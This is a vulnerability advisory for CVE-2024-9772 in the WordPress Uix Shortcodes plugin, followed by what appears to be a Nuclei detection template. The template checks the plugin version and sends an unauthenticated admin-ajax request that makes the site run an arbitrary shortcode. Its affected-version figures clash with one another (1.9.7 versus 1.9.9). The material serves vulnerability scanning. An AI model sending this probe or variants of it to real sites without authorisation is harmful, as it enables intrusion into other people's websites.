The The Uix Shortcodes – Compatible with Gutenberg plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.9.9. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
PoC代码[已公开]
id: CVE-2024-9772
info:
name: WordPress UIX Shortcodes <= 1.9.7 - Unauthenticated Shortcode Execution
author: kankburhan
severity: high
description: |
The The Uix Shortcodes – Compatible with Gutenberg plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.9.9. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
remediation: |
Update UIX Shortcodes plugin to the latest patched version (>= 1.9.8).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-9772
- https://downloads.wordpress.org/plugin/uix-shortcodes.1.9.7.zip
- https://plugins.trac.wordpress.org/browser/uix-shortcodes/trunk/shortcodes/templates/default/frontpage-init.php#L9
- https://wordpress.org/plugins/uix-shortcodes/#developers
- https://www.wordfence.com/threat-intel/vulnerabilities/id/3000758d-68e0-46a6-aef0-e2407a828168?source=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score: 7.3
cve-id: CVE-2024-9772
cwe-id: CWE-94
epss-score: 0.05077
epss-percentile: 0.89392
cpe: cpe:2.3:a:uiux:uix_shortcodes:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: uiux
product: uix_shortcodes
framework: wordpress
publicwww-query: "/wp-content/plugins/uix-shortcodes/"
tags: cve,cve2024,wordpress,wp-plugin,wp,wpscan,shortcode,uix-shortcodes
variables:
string: "{{to_lower('{{randstr}}')}}"
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/uix-shortcodes/readme.txt"
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, 'Uix Shortcodes')"
- "compare_versions(version, '<= 1.9.7')"
condition: and
internal: true
extractors:
- type: regex
part: body
group: 1
name: version
regex:
- 'Stable tag: ([0-9.]+)'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=uixscform_ajax_shortcodepreview&previewcode=[uix_sc_text text='{{string}}']
matchers:
- type: dsl
dsl:
- 'contains_all(body, "{{string}}")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402200d7726b197d69cee51fbd7dbfd9da9718a1ac7ebb9c98e26dee1b25013e9b647022016ab32735cab354a164b4978c12ab37db187070d191954b44b2971d9fa9df5e6:922c64590222798bb761d5b6d8e72950